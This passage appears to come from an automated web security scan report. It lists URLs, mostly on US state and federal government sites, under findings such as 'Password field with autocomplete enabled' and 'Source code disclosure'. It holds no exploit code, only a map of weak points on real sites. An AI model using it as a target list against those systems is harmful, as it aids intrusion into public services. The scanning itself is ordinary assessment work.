14.219. http://www.utah.gov/transparency/index.html

14.220. http://www.utah.gov/whatsnew/rss.xml

14.221. http://www.va.gov/ext_redirect.asp

14.222. https://www.vermontjoblink.com/ada/

14.223. https://www.vermontjoblink.com/ada/404/404_qry.cfm

14.224. https://www.vermontjoblink.com/ada/customization/Vermont/documents/eeoislaw.cfm

14.225. https://www.vermontjoblink.com/ada/customization/Vermont/documents/privacy.cfm

14.226. https://www.vermontjoblink.com/ada/customization/Vermont/favicon.ico

14.227. https://www.vermontjoblink.com/ada/default.cfm

14.228. https://www.vermontjoblink.com/ada/etp/etp_newuser_dsp.cfm

14.229. https://www.vermontjoblink.com/ada/leavesite.cfm

14.230. https://www.vermontjoblink.com/ada/mn_eligibility_dsp.cfm

14.231. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm

14.232. https://www.vermontjoblink.com/ada/mn_login_fnc.cfm

14.233. https://www.vermontjoblink.com/ada/mn_offices_dsp.cfm

14.234. https://www.vermontjoblink.com/ada/mn_protectyourself_dsp.cfm

14.235. https://www.vermontjoblink.com/ada/mn_quicksearch_dsp.cfm

14.236. https://www.vermontjoblink.com/ada/mn_registration_dsp.cfm

14.237. https://www.vermontjoblink.com/ada/mn_settings_dsp.cfm

14.238. https://www.vermontjoblink.com/ada/mn_ssncheck.cfm

14.239. https://www.vermontjoblink.com/ada/mn_veterans_dsp.cfm

14.240. https://www.vermontjoblink.com/ada/mn_warn_dsp.cfm

14.241. https://www.vermontjoblink.com/ada/services/schools/schsearch.cfm

14.242. https://www.vermontjoblink.com/ada/works/FAQ.cfm

14.243. https://www.vermontjoblink.com/ada/works/Login.cfm

14.244. https://www.vermontjoblink.com/ada/works/contactus.cfm

14.245. https://www.vermontjoblink.com/ada/works/employeroverview.cfm

14.246. https://www.vermontjoblink.com/ada/works/joboverview.cfm

14.247. https://www.vermontjoblink.com/ada/works/jobsearch.cfm

14.248. https://www.vermontjoblink.com/ada/works/linkview.cfm

14.249. https://www.vermontjoblink.com/ada/works/resourcesoverview.cfm

14.250. https://www.vermontjoblink.com/favicon.ico

14.251. http://www.visitflorida.com/floridalive

14.252. http://www.vsea.org/

14.253. http://www.webtools.ca.gov/javascript/shared/weather2/weather3.js.asp

14.254. http://a.triggit.com/px

14.255. http://ad.yieldmanager.com/pixel

14.256. http://ad.yieldmanager.com/unpixel

14.257. http://ads.adbrite.com/adserver/vdi/711384

14.258. https://adwords.google.com/um/StartNewLogin

14.259. http://amix.dk/

14.260. http://api.twitter.com/1/statuses/user_timeline/okgov.json

14.261. https://ask.census.gov/cgi-bin/askcensus.cfg/php/enduser/std_adp.php

14.262. https://assist.dhss.delaware.gov/INCLUDES/INJSC.JS

14.263. https://assist.dhss.delaware.gov/PGM/asp/pdf/form204GoodCauseforReftoCoopinDSCE.pdf

14.264. https://assist.dhss.delaware.gov/Style/ASSIST_SC_StyleNET.css

14.265. https://assist.dhss.delaware.gov/Style/Assist_Style_NET.css

14.266. https://assist.dhss.delaware.gov/favicon.ico

14.267. https://assist.dhss.delaware.gov/images/Assist_header_people.jpg

14.268. https://assist.dhss.delaware.gov/images/Assist_header_text.gif

14.269. https://assist.dhss.delaware.gov/images/Assist_logo.gif

14.270. https://assist.dhss.delaware.gov/images/arrow_center.gif

14.271. https://assist.dhss.delaware.gov/images/arrow_left.gif

14.272. https://assist.dhss.delaware.gov/images/arrow_right.gif

14.273. https://assist.dhss.delaware.gov/images/corner_brown_color.gif

14.274. https://assist.dhss.delaware.gov/images/corner_teal_color.gif

14.275. https://assist.dhss.delaware.gov/images/gold_rule_shim.gif

14.276. https://assist.dhss.delaware.gov/images/shim.gif

14.277. http://b.scorecardresearch.com/b

14.278. http://bh.contextweb.com/bh/rtset

14.279. http://bh.contextweb.com/bh/set.aspx

14.280. http://blogsearch.google.com/

14.281. http://books.google.com/bkshp

14.282. http://books.google.com/books

14.283. http://bs.serving-sys.com/BurstingPipe/adServer.bs

14.284. http://co.gov/

14.285. http://del.icio.us/post

14.286. http://delicious.com/post

14.287. http://digg.com/submit

14.288. https://favorites.live.com/quickadd.aspx

14.289. http://finance.yahoo.com/q

14.290. https://fortress.wa.gov/dol/dolprod/vehoffices/

14.291. http://groups.google.com/grphp

14.292. http://i.w55c.net/rs

14.293. http://ia.gov/

14.294. http://ia.gov/weather_conditions/9430739

14.295. http://idaho.gov/public/portal/contact.html

14.296. http://idcs.interclick.com/Segment.aspx

14.297. http://image.providesupport.com/js/hic/safe-standard.js

14.298. http://image.providesupport.com/js/hic/safe-textlink.js

14.299. http://image2.pubmatic.com/AdServer/Pug

14.300. http://in.gov/

14.301. http://in.gov/apps/ii/oss/agencyInfo/listing

14.302. http://in.gov/apps/ii/oss/agencyInfo/selection

14.303. http://in.gov/apps/ii/oss/categoryInfo/listing

14.304. http://in.gov/apps/ii/oss/categoryInfo/selection

14.305. http://in.gov/apps/ii/oss/js/application.js

14.306. http://in.gov/apps/ii/oss/js/filterlist.js

14.307. http://in.gov/apps/ii/oss/mostPopularInfo/selection

14.308. http://in.gov/apps/ii/oss/search/term

14.309. http://in.gov/core/agriculture.html

14.310. http://in.gov/core/business.html

14.311. http://in.gov/core/css/global.css

14.312. http://in.gov/core/css/global2.css

14.313. http://in.gov/core/images/advanced_search-bg.gif

14.314. http://in.gov/core/images/amber_alert.gif

14.315. http://in.gov/core/images/atg.gif

14.316. http://in.gov/core/images/bgs.gif

14.317. http://in.gov/core/images/billboards/INGOV_severe_weather.jpg

14.318. http://in.gov/core/images/billboards/INgov_DNRapp_bb.jpg

14.319. http://in.gov/core/images/billboards/SOS__billboard.jpg

14.320. http://in.gov/core/images/billboards/ingov_inshapebb.jpg

14.321. http://in.gov/core/images/billboards/ingov_tindleybb.jpg

14.322. http://in.gov/core/images/blue_pixel.gif

14.323. http://in.gov/core/images/calendar_icon.gif

14.324. http://in.gov/core/images/elected_officials-icon2.gif

14.325. http://in.gov/core/images/faq_icon-over.gif

14.326. http://in.gov/core/images/faq_icon.gif

14.327. http://in.gov/core/images/footer-wide.gif

14.328. http://in.gov/core/images/footer.gif

14.329. http://in.gov/core/images/go.gif

14.330. http://in.gov/core/images/governor_daniels.gif

14.331. http://in.gov/core/images/highlights_bg_horiz.gif

14.332. http://in.gov/core/images/highlights_bg_vert.gif

14.333. http://in.gov/core/images/highlights_bottom.gif

14.334. http://in.gov/core/images/highlights_left.gif

14.335. http://in.gov/core/images/highlights_right.gif

14.336. http://in.gov/core/images/icon_email.gif

14.337. http://in.gov/core/images/icon_findperson.gif

14.338. http://in.gov/core/images/icon_help.gif

14.339. http://in.gov/core/images/icon_link.gif

14.340. http://in.gov/core/images/icon_mobile.gif

14.341. http://in.gov/core/images/icon_ratepage.gif

14.342. http://in.gov/core/images/icon_rss.gif

14.343. http://in.gov/core/images/icon_subscribe.gif

14.344. http://in.gov/core/images/icon_twitter.gif

14.345. http://in.gov/core/images/icon_youtube.gif

14.346. http://in.gov/core/images/indiana_map.gif

14.347. http://in.gov/core/images/ingov_logo.gif

14.348. http://in.gov/core/images/lgov.gif

14.349. http://in.gov/core/images/link_divider.gif

14.350. http://in.gov/core/images/main_bg-wide.gif

14.351. http://in.gov/core/images/main_bg.gif

14.352. http://in.gov/core/images/next.gif

14.353. http://in.gov/core/images/next.png

14.354. http://in.gov/core/images/online_services_icon-over.gif

14.355. http://in.gov/core/images/online_services_icon.gif

14.356. http://in.gov/core/images/page_bg.jpg

14.357. http://in.gov/core/images/prev.gif

14.358. http://in.gov/core/images/prev.png

14.359. http://in.gov/core/images/search_button-new2.gif

14.360. http://in.gov/core/images/search_button.gif

14.361. http://in.gov/core/images/searchfield_bg-new2.gif

14.362. http://in.gov/core/images/sos.gif

14.363. http://in.gov/core/images/subscribe_button.gif

14.364. http://in.gov/core/images/tab_bg.gif

14.365. http://in.gov/core/images/tab_left.gif

14.366. http://in.gov/core/images/tab_right.gif

14.367. http://in.gov/core/images/topnav_bg.jpg

14.368. http://in.gov/core/images/topnav_left.jpg

14.369. http://in.gov/core/images/topnav_right.jpg

14.370. http://in.gov/core/index_pages/quicklinks.html

14.371. http://in.gov/core/index_pages/void()

14.372. http://in.gov/core/js/_arss.js

14.373. http://in.gov/core/js/agency.js

14.374. http://in.gov/core/js/arss.css

14.375. http://in.gov/core/js/arss.js

14.376. http://in.gov/core/js/faq.js

14.377. http://in.gov/core/js/jquery-1.4.2.min.js

14.378. http://in.gov/core/js/jquery.jfontsizer.js

14.379. http://in.gov/core/js/jquery.metadata.min.js

14.380. http://in.gov/core/js/jquery.slideshow.js

14.381. http://in.gov/core/js/jquery.swapimage.min.js

14.382. http://in.gov/core/js/menu.js

14.383. http://in.gov/core/js/portal_scripts.js

14.384. http://in.gov/core/js/prototype-1.6.1.js

14.385. http://in.gov/core/online_services.html

14.386. http://in.gov/favicon.ico

14.387. http://in.gov/gov/photo.htm

14.388. http://in.gov/sos/securities/2521.htm

14.389. http://in.gov/spd/2333.htm

14.390. http://in.gov/void()

14.391. http://io9.com/assets/base.v9/js/selcontsimple.js

14.392. https://iris.custhelp.com/

14.393. https://iris.custhelp.com/app/answers/detail/a_id/936/session/L3RpbWUvMTMwNDEyNDM1OS9zaWQvUlBRT3NLc2s%3D

14.394. https://iris.custhelp.com/app/home

14.395. https://iris.custhelp.com/euf/assets/css/2009/jkmegamenu.css

14.396. https://iris.custhelp.com/euf/assets/css/2009/va-styles.css

14.397. https://iris.custhelp.com/euf/assets/css/2009/va-user-styles.css

14.398. https://iris.custhelp.com/euf/assets/css/2009/vaSearch.css

14.399. https://iris.custhelp.com/euf/rightnow/optimized/templates/ps_iris_home1302801724.themes.iris.SITE.css

14.400. https://iris.custhelp.com/rnt/rnw/css/enduser.css

14.401. https://iris.custhelp.com/rnt/rnw/img/enduser/2009/img-bullet.gif

14.402. https://iris.custhelp.com/rnt/rnw/javascript/2009/global.js

14.403. https://iris.va.gov/favicon.ico

14.404. http://kdkgllry.netmng.com/

14.405. http://khmdb0.google.com/kh

14.406. http://khmdb1.google.com/kh

14.407. http://ksgovernment.feedbacksurvey.sgizmo.com/

14.408. https://maps-api-ssl.google.com/maps

14.409. http://metrics.kodakgallery.com/b/ss/kinkodakgallerycomprod/1/H.22.1/s78523519213777

14.410. http://nc.gov/

14.411. http://newbrowse.livehelper.com/servlet/lhBrowse

14.412. http://nv.gov/

14.413. https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/acct_login.php

14.414. http://pipes.yahoo.com/pipes/pipe.run

14.415. https://pixel.fetchback.com/serve/fb/pdc

14.416. http://pixel.mathtag.com/event/img

14.417. http://pixel.quantserve.com/pixel

14.418. http://pixel.rubiconproject.com/tap.php

14.419. https://portal.s4web.state.mn.us/psp/por91ssap/SELFSERVICE/ENTP/h/

14.420. http://sc.gov/

14.421. http://scholar.google.com/schhp

14.422. http://sd.gov/

14.423. http://sdc.state.nj.us/dcs9ir25300000ggffs6h6i8r_2f2e/dcs.gif

14.424. http://sdc.state.nj.us/dcs9ir25300000ggffs6h6i8r_2f2e/dcs.gif

14.425. http://server.iad.liveperson.net/hc/33511087/

14.426. http://server.iad.liveperson.net/hc/33511087/

14.427. http://server.iad.liveperson.net/hc/33511087/x.js

14.428. http://shots.snap.com/snap_shots.js

14.429. http://stateofgeorgia.122.2o7.net/b/ss/georgiagovprod/1/H.16/s21968461417127

14.430. http://stateofgeorgia.122.2o7.net/b/ss/georgiagovprod/1/H.16/s22063515547197

14.431. http://stateofgeorgia.122.2o7.net/b/ss/georgiagovprod/1/H.16/s22238083938136

14.432. http://stateofgeorgia.122.2o7.net/b/ss/georgiagovprod/1/H.16/s25464643554296

14.433. http://stateofgeorgia.122.2o7.net/b/ss/georgiagovprod/1/H.16/s27148967052344

14.434. http://stateofgeorgia.122.2o7.net/b/ss/georgiagovprod/1/H.16/s2762329166755

14.435. http://stateofgeorgia.122.2o7.net/b/ss/georgiagovprod/1/H.16/s27866187379695

14.436. http://stateofgeorgia.122.2o7.net/b/ss/georgiagovprod/1/H.16/s27866187379695

14.437. http://stateofgeorgia.122.2o7.net/b/ss/georgiagovprod/1/H.16/s29011461706832

14.438. http://statse.webtrendslive.com/dcs5fmvbf00000cprngdzyrz5_9u7t/dcs.gif

14.439. http://statse.webtrendslive.com/dcs5fmvbf00000cprngdzyrz5_9u7t/dcs.gif

14.440. http://statse.webtrendslive.com/dcsvtpx6221e5hyrdsxs9yl5f_6q9i/njs.gif

14.441. http://translate.googleapis.com/translate_a/l

14.442. https://treas-secure.treas.state.mi.us/eservice_enu/start.swe

14.443. http://twitter.com/statuses/user_timeline/IDAHOgov.json

14.444. http://va.gov/

14.445. http://video.google.com/

14.446. http://visitor.constantcontact.com/d.jsp

14.447. http://wbtdcs.nara.gov/dcs5w0txb10000wocrvqy1nqm_6n1p/dcs.gif

14.448. http://webmail.aol.com/

14.449. http://wt-sdc-01.ai.org/dcsc11w1f000000spafo59hrd_4w9q/dcs.gif

14.450. http://wt-sdc-01.ai.org/dcsc11w1f000000spafo59hrd_4w9q/dcs.gif

14.451. https://www.accesskansas.org/images/footer_images/current_year.gif

14.452. https://www.accesskansas.org/images/footer_images/from2002.gif

14.453. https://www.accesskansas.org/kbc/img/icons/external.png

14.454. http://www.act.org/certificate/employers.html

14.455. https://www.alabamainteractive.org/favicon.ico

14.456. http://www.amberalert.com/en/alerts/state/

14.457. http://www.atg.wa.gov/BlogPost.aspx

14.458. https://www.bbb.org/online/consumer/cks.aspx

14.459. http://www.blogs.va.gov/VAntage/

14.460. http://www.colorado.gov/cms/coloradogov/images/bgrd_bulletBlue.gif

14.461. http://www.colorado.gov/cms/coloradogov/images/bgrd_callBoxGray.gif

14.462. http://www.colorado.gov/cms/coloradogov/images/bgrd_cbe3.gif

14.463. http://www.colorado.gov/cms/coloradogov/images/bgrd_lottoBack2.gif

14.464. http://www.colorado.gov/cms/coloradogov/images/bgrd_stateLegTabSeal.png

14.465. http://www.colorado.gov/cms/coloradogov/images/bgrd_tabPanel-dash.gif

14.466. http://www.colorado.gov/cms/coloradogov/images/bgrd_tabPanel2.gif

14.467. http://www.colorado.gov/cms/coloradogov/images/bgrd_tabPanel4.gif

14.468. http://www.colorado.gov/cms/coloradogov/images/img_cash5Short.gif

14.469. http://www.colorado.gov/cms/coloradogov/images/img_leftArrow.gif

14.470. http://www.colorado.gov/cms/coloradogov/images/img_leftArrow_disable.gif

14.471. http://www.colorado.gov/cms/coloradogov/images/img_lottoBall.png

14.472. http://www.colorado.gov/cms/coloradogov/images/img_lottoBallGreen.png

14.473. http://www.colorado.gov/cms/coloradogov/images/img_lottoShort.gif

14.474. http://www.colorado.gov/cms/coloradogov/images/img_matchplayShort.gif

14.475. http://www.colorado.gov/cms/coloradogov/images/img_megamillionsShort.gif

14.476. http://www.colorado.gov/cms/coloradogov/images/img_powerballShort.gif

14.477. http://www.colorado.gov/cms/coloradogov/images/img_rightArrow.gif

14.478. http://www.colorado.gov/cms/coloradogov/images/img_rightArrow_disable.gif

14.479. http://www.colorado.gov/cms/coloradogov/images/tab_CBE2-blu.gif

14.480. http://www.colorado.gov/cms/coloradogov/images/tab_agHiLt-clr.gif

14.481. http://www.colorado.gov/cms/coloradogov/images/tab_alerts-red.gif

14.482. http://www.colorado.gov/cms/coloradogov/images/tab_govInt-govTrns-blu.gif

14.483. http://www.colorado.gov/cms/coloradogov/images/tab_howdoi-blu.gif

14.484. http://www.colorado.gov/cms/coloradogov/images/tab_infofor-blu.gif

14.485. http://www.colorado.gov/cms/coloradogov/images/tab_services-blu.gif

14.486. http://www.colorado.gov/cms/coloradogov/images/tab_services-clr.gif

14.487. http://www.colorado.gov/cms/coloradogov/images/tab_stateLeg-blu.gif

14.488. http://www.colorado.gov/cms/coloradogov/images/tab_statenews-blu.gif

14.489. http://www.colorado.gov/cms/coloradogov/images/tab_statenews-clr.gif

14.490. http://www.colorado.gov/cms/coloradogov/images/tab_traffic-blu.gif

14.491. http://www.colorado.gov/cms/coloradogov/images/tab_weather-blu.gif

14.492. http://www.colorado.gov/cms/coloradogov/images/tab_weather-clr.gif

14.493. https://www.colorado.gov/apps/dps/mvvs/public/entry.jsf

14.494. https://www.colorado.gov/apps/feedback/servlet/begin

14.495. http://www.conwaygreene.com/nmsu/lpext.dll

14.496. http://www.ct.gov/ctportal/cwp/view.asp

14.497. http://www.ct.gov/ctportal/site/default.asp

14.498. http://www.ct.gov/ctportal/taxonomy/taxonomy.asp

14.499. http://www.ct.gov/dcp/cwp/view.asp

14.500. http://www.ct.gov/dep/cwp/view.asp

14.501. http://www.ct.gov/dmv/cwp/view.asp

14.502. http://www.ct.gov/drs/cwp/view.asp

14.503. http://www.ct.gov/opm/cwp/view.asp

14.504. http://www.dms.myflorida.com/business_operations/state_purchasing/myflorida_marketplace

14.505. http://www.dms.myflorida.com/business_operations/state_purchasing/myflorida_marketplace/mfmp_buyers

14.506. http://www.dms.myflorida.com/business_operations/state_purchasing/myflorida_marketplace/mfmp_buyers/online_purchasing

14.507. http://www.dms.myflorida.com/index.php/business_operations/state_purchasing/myflorida_marketplace/mfmp_buyers/online_purchasing

14.508. http://www.elearningnc.gov/

14.509. http://www.facebook.com/TeamHaslam

14.510. http://www.facebook.com/WSDOL

14.511. http://www.facebook.com/note.php

14.512. http://www.facebook.com/ohiodivisionofwatercraft

14.513. http://www.facebook.com/pages/Austin-TX/Texasgov/117263931626845

14.514. http://www.facebook.com/pages/Social-Circle-GA/Wildlife-Resources-Division-GADNR/101012503387

14.515. http://www.facebook.com/pages/Trenton-NJ/NJ-Department-of-Education-Family-and-Community-Relations/122601104423680

14.516. http://www.facebook.com/photo.php

14.517. http://www.facebook.com/share.php

14.518. http://www.facebook.com/video/video.php

14.519. http://www.flickr.com/groups_join.gne

14.520. http://www.governor.ct.gov/malloy/cwp/view.asp

14.521. http://www.governor.ny.gov/

14.522. https://www.humanservices.state.pa.us/Compass.Web/CMHOM.aspx

14.523. http://www.ieaddons.com/en/ie8slice/wsUpdate.aspx

14.524. http://www.illinoisfilm.biz/index.php

14.525. http://www.in.gov/ai/appfiles/cms/alert.css

14.526. http://www.in.gov/ai/appfiles/oss/oss_logos/bmv_oss.jpg

14.527. http://www.in.gov/ai/errors/dwd_404.html

14.528. http://www.in.gov/ai/js-webtrends/webtrends.js

14.529. http://www.in.gov/ai/js-webtrends/wtbase.js

14.530. http://www.in.gov/apps/options/email.aspx

14.531. http://www.in.gov/apps/options/rate.aspx

14.532. http://www.in.gov/apps/options/suggestion.aspx

14.533. http://www.in.gov/core/faqs.html

14.534. http://www.in.gov/dhs/3163.htm

14.535. http://www.in.gov/dnr/6406.htm

14.536. http://www.in.gov/dwd/2216.css

14.537. http://www.in.gov/dwd/2217.js

14.538. http://www.in.gov/dwd/WorkOne//

14.539. http://www.in.gov/dwd/WorkOne//favicon.ico

14.540. http://www.in.gov/dwd/WorkOne//images/body_bg.gif

14.541. http://www.in.gov/dwd/WorkOne//images/index_footer.jpg

14.542. http://www.in.gov/dwd/WorkOne//images/index_people.png

14.543. http://www.in.gov/dwd/WorkOne//images/wrapper_bg.gif

14.544. http://www.in.gov/dwd/WorkOne//scripts/gfeedfetcher.js

14.545. http://www.in.gov/dwd/WorkOne//styles/index_layout.css

14.546. http://www.in.gov/dwd/WorkOne//styles/index_styles.css

14.547. http://www.in.gov/dwd/WorkOne//styles/layout.css

14.548. http://www.in.gov/dwd/WorkOne//styles/reset.css

14.549. http://www.in.gov/dwd/WorkOne//styles/styles.css

14.550. http://www.in.gov/dwd/WorkOne/images/index_arrow.png

14.551. http://www.in.gov/dwd/WorkOne/images/index_title.png

14.552. http://www.in.gov/dwd/WorkOne/scripts//dwd/WorkOne/scripts/indicator.gif

14.553. http://www.in.gov/dwd/images/GovDev_Left_Logo.jpg

14.554. http://www.in.gov/dwd/images/amber_void.jpg

14.555. http://www.in.gov/dwd/images/col2_top_bg.jpg

14.556. http://www.in.gov/dwd/images/col3_top_bg.gif

14.557. http://www.in.gov/dwd/images/faq_bg.jpg

14.558. http://www.in.gov/dwd/images/link_header_bg.jpg

14.559. http://www.in.gov/dwd/images/navMore.gif

14.560. http://www.in.gov/dwd/images/subscribe_dwd.jpg

14.561. http://www.in.gov/dwd/images/uplink_btn_rdax_100_rdax_100.jpg

14.562. http://www.in.gov/dwd/images/want_bg.jpg

14.563. http://www.in.gov/dwd/images/widget2_rdax_100_rdax_100.jpg

14.564. http://www.in.gov/idem/hoosierscare/5601.htm

14.565. http://www.in.gov/iedc/

14.566. http://www.in.gov/isda/2435.htm

14.567. http://www.in.gov/oed/2367.htm

14.568. http://www.in.gov/oed/2572.htm

14.569. http://www.in.gov/pla/license.htm

14.570. http://www.in.gov/portal/global/css/5.css

14.571. http://www.in.gov/portal/global/css/7.css

14.572. http://www.in.gov/portal/global/images/about_bg.jpg

14.573. http://www.in.gov/portal/global/images/bullet_white.gif

14.574. http://www.in.gov/portal/global/images/header.jpg

14.575. http://www.in.gov/portal/global/images/horz_nav.jpg

14.576. http://www.in.gov/portal/global/images/horz_nav2_bg.jpg

14.577. http://www.in.gov/portal/global/images/mobile-icon-hover4.gif

14.578. http://www.in.gov/portal/global/images/nav_bg.jpg

14.579. http://www.in.gov/portal/global/images/rss-logo.jpg

14.580. http://www.in.gov/portal/global/images/search_bg.jpg

14.581. http://www.in.gov/portal/global/images/tour_bg.jpg

14.582. http://www.in.gov/portal/global/javascript/9.js

14.583. http://www.in.gov/portal/images/amberalert.jpg

14.584. http://www.in.gov/portal/images/amberalerttest.jpg

14.585. http://www.in.gov/portal/images/govdev_icon0.gif

14.586. http://www.in.gov/portal/images/horz_nav2_bg_solid.jpg

14.587. http://www.in.gov/portal/images/link.gif

14.588. http://www.in.gov/portal/images/linkhover.gif

14.589. http://www.in.gov/portal/images/mail.gif

14.590. http://www.in.gov/portal/images/mobile-icon.gif

14.591. http://www.in.gov/portal/images/print.gif

14.592. http://www.in.gov/portal/images/rate.gif

14.593. http://www.in.gov/portal/images/rss_logo.gif

14.594. http://www.in.gov/portal/images/search_button.jpg

14.595. http://www.in.gov/recycle/5636.htm

14.596. http://www.indianacareerconnect.com/

14.597. https://www.mcafeesecure.com/RatingVerify

14.598. http://www.mdod.maryland.gov/WorkArea/linkit.aspx

14.599. http://www.michie.com/tennessee/lpext.dll

14.600. http://www.michigan.org/Partners/Default.aspx

14.601. http://www.ncesc.com/lmi/default.asp

14.602. https://www.nrsservicecenter.com/content/media/retail/css/dcdweb/Ohio457-site.css

14.603. https://www.nrsservicecenter.com/content/media/retail/css/dcdweb/base-style.css

14.604. https://www.nrsservicecenter.com/content/media/retail/css/dcdweb/print.css

14.605. https://www.nrsservicecenter.com/content/media/retail/images/AdTeasers/Ohio457/NewWelcomeBanner.jpg

14.606. https://www.nrsservicecenter.com/content/media/retail/images/Logos/Ohio457.gif

14.607. https://www.nrsservicecenter.com/content/media/retail/images/Ohio457/bgGrads/bgGradient.jpg

14.608. https://www.nrsservicecenter.com/content/media/retail/images/Ohio457/bgGrads/bgGradientAcctLogin.jpg

14.609. https://www.nrsservicecenter.com/content/media/retail/images/Ohio457/bgGrads/bgGradientHomeContentAreas.jpg

14.610. https://www.nrsservicecenter.com/content/media/retail/images/Ohio457/navTabs/tabLeft.gif

14.611. https://www.nrsservicecenter.com/content/media/retail/images/Ohio457/navTabs/tabRight.gif

14.612. https://www.nrsservicecenter.com/content/media/retail/images/Ohio457/sprites/login-button.gif

14.613. https://www.nrsservicecenter.com/content/media/retail/images/Ohio457/sprites/login-lock.gif

14.614. https://www.nrsservicecenter.com/content/media/retail/js/wtlOhio.js

14.615. https://www.nrsservicecenter.com/favicon.ico

14.616. http://www.nv.gov/NV_default4.aspx

14.617. http://www.nv.gov/WorkArea/DmsMenu/DmsMenu.js

14.618. http://www.nv.gov/WorkArea/java/ektron.js

14.619. http://www.nv.gov/WorkArea/java/thickbox.js

14.620. http://www.nv.gov/workarea/java/ektronJs.ashx

14.621. https://www.ri.gov/Licensing/renewal/license.php

14.622. http://www.sc.gov/PublishingImages/favicon.ico

14.623. https://www.scsignon.sc.gov/

14.624. https://www.scsignon.sc.gov/Common/HelpWindow.aspx

14.625. https://www.scsignon.sc.gov/Eng/Secured/Security/ForgotPassword.aspx

14.626. https://www.scsignon.sc.gov/Eng/Secured/Security/ForgotUserName.aspx

14.627. https://www.scsignon.sc.gov/Login.aspx

14.628. https://www.scsignon.sc.gov/SCBOS.Core.DynamicFormsGlobal.Resources.aspx

14.629. https://www.scsignon.sc.gov/SCBOS.Core.Framework.Imaging.Resources.aspx

14.630. https://www.scsignon.sc.gov/SCBOS.Core.Framework.Web.Controls.Resources.aspx

14.631. https://www.scsignon.sc.gov/SCBOS.Core.Framework.Web.UI.Resources.aspx

14.632. https://www.scsignon.sc.gov/WebResource.axd

14.633. https://www.scsignon.sc.gov/eng/Secured/Security/CreateUserName.aspx

14.634. http://www.state.co.us/gov_dir/leg_dir/gaweb/scroom353.asx

14.635. http://www.state.mn.us/portal/mn/jsp/content.do

14.636. http://www.state.mn.us/portal/mn/jsp/contentprocess.do

14.637. http://www.state.mn.us/portal/mn/jsp/home.do

14.638. http://www.state.mn.us/portal/mn/jsp/hybrid.do

14.639. http://www.state.mn.us/portal/mn/jsp/logon.do

14.640. http://www.state.mn.us/portal/mn/jsp/redirectLink.do

14.641. http://www.state.mn.us/portal/mn/jsp/search.do

14.642. http://www.state.sd.us/calendar/index.cfm

14.643. http://www.surveymonkey.com/jsPop.aspx

14.644. http://www.va.gov/directory/guide/division_flsh.asp

14.645. http://www.va.gov/iris/home.html

14.646. http://www.va.gov/landing2_contact.htm

14.647. http://www.va.gov/opa/pressrel/pressrelease.cfm

14.648. http://www.visitflorida.com/includes/js/footerSurvey.php

14.649. http://www.vitalchek.com/Campaign

14.650. http://www.vitalchek.com/Campaign/

14.651. http://www.vitalchek.com/Telerik.Web.UI.WebResource.axd

14.652. http://www.vitalchek.com/WebResource.axd

14.653. http://www.vitalchek.com/css/Portal/VitalChek/main.aspx

14.654. http://www.vitalchek.com/default.aspx

14.655. http://www.vitalchek.com/images/background/bg_chat.png

14.656. http://www.vitalchek.com/js/google_analytics_js.aspx

14.657. http://www.wor710.com/topic/play_window.php

14.658. http://www.wycokck.org/dept.aspx

15. Password field with autocomplete enabled

15.1. https://apps.tn.gov/biztax-app/login.html

15.2. https://bugzilla.mozilla.org/show_bug.cgi

15.3. https://bugzilla.mozilla.org/show_bug.cgi

15.4. http://digg.com/submit

15.5. https://dotax.ehawaii.gov/efile/user

15.6. https://mibid.bidcorp.com/Login.aspx

15.7. https://mibid.bidcorp.com/login.aspx

15.8. https://myalaska.state.ak.us/home/app

15.9. https://myalaska.state.ak.us/login/login.aspx

15.10. http://myflorida.custhelp.com/cgi-bin/myflorida.cfg/php/enduser/acct_login.php

15.11. https://nhlicenses.nh.gov/MyLicense%20Enterprise/

15.12. https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/acct_login.php

15.13. https://onestop.michigan.gov/OneStop/a

15.14. https://onestop.michigan.gov/css/none

15.15. https://onestop.michigan.gov/images/imgBanBG.gif

15.16. https://onestop.michigan.gov/onestop-main/OneStop/a

15.17. https://onestop.michigan.gov/onestop-main/OneStop/obDesiredBiz.do

15.18. http://pa.gov/portal/server.pt

15.19. https://portal01.state.nj.us/http:/portal20.sa.state.nj.us:8080/amserver/UI/Login

15.20. http://www.alabama.gov/portal/index.jsp

15.21. https://www.compasssmartshopper.com/default.aspx

15.22. https://www.ehawaii.gov/efile/

15.23. http://www.facebook.com/TeamHaslam

15.24. http://www.facebook.com/WSDOL

15.25. http://www.facebook.com/note.php

15.26. http://www.facebook.com/ohiodivisionofwatercraft

15.27. http://www.facebook.com/photo.php

15.28. http://www.facebook.com/share.php

15.29. https://www.humanservices.state.pa.us/Compass.Web/CMHOM.aspx

15.30. https://www.humanservices.state.pa.us/siteminderagent/forms/calen2.fcc

15.31. https://www.humanservices.state.pa.us/siteminderagent/forms/calen2.fcc

15.32. https://www.myhealth.va.gov/mhv-portal-web/anonymous.portal

15.33. https://www.nrsservicecenter.com/iApp/ret/cmd/RetLogin

15.34. https://www.nrsservicecenter.com/iApp/ret/content/landing.do

15.35. https://www.nrsservicecenter.com/iApp/ret/landing.do

15.36. https://www.nrsservicecenter.com/iApp/ret/showPage.do

15.37. https://www.scsignon.sc.gov/

15.38. https://www.scsignon.sc.gov/

15.39. https://www.scsignon.sc.gov/Login.aspx

15.40. https://www.vermontjoblink.com/ada/

15.41. https://www.vermontjoblink.com/ada/default.cfm

15.42. https://www.vermontjoblink.com/ada/etp/etp_newuser_dsp.cfm

15.43. https://www.vermontjoblink.com/ada/etp/etp_newuser_dsp.cfm

15.44. https://www.vermontjoblink.com/ada/mn_registration_dsp.cfm

15.45. https://www.vermontjoblink.com/ada/mn_registration_dsp.cfm

15.46. https://www.vermontjoblink.com/ada/mn_registration_dsp.cfm

15.47. https://www.vermontjoblink.com/ada/works/Login.cfm

15.48. https://www.vermontjoblink.com/ada/works/Login.cfm

15.49. http://www.visitflorida.com/floridalive

15.50. http://www.vsea.org/

15.51. http://www.vsea.org/editorial-lays-out-vermont%26%23039

15.52. http://www.vsea.org/favicon.ico

15.53. http://www.vsea.org/join-vsea

15.54. http://www.vsea.org/join-your-union

15.55. http://www.vsea.org/maine-study-finds-state%26%23039

15.56. http://www.vsea.org/node

15.57. http://www.vsea.org/purchase-vsea-clothing

15.58. http://www.vsea.org/state-hospital%26%23039

16. Source code disclosure

16.1. http://data.ok.gov/packages/base.js

16.2. http://data.ok.gov/packages/shared-map.js

16.3. http://data.ok.gov/packages/shared-table-editor.js

16.4. https://onestop.michigan.gov/onestop-main/OneStop/js/actionSubmit.js

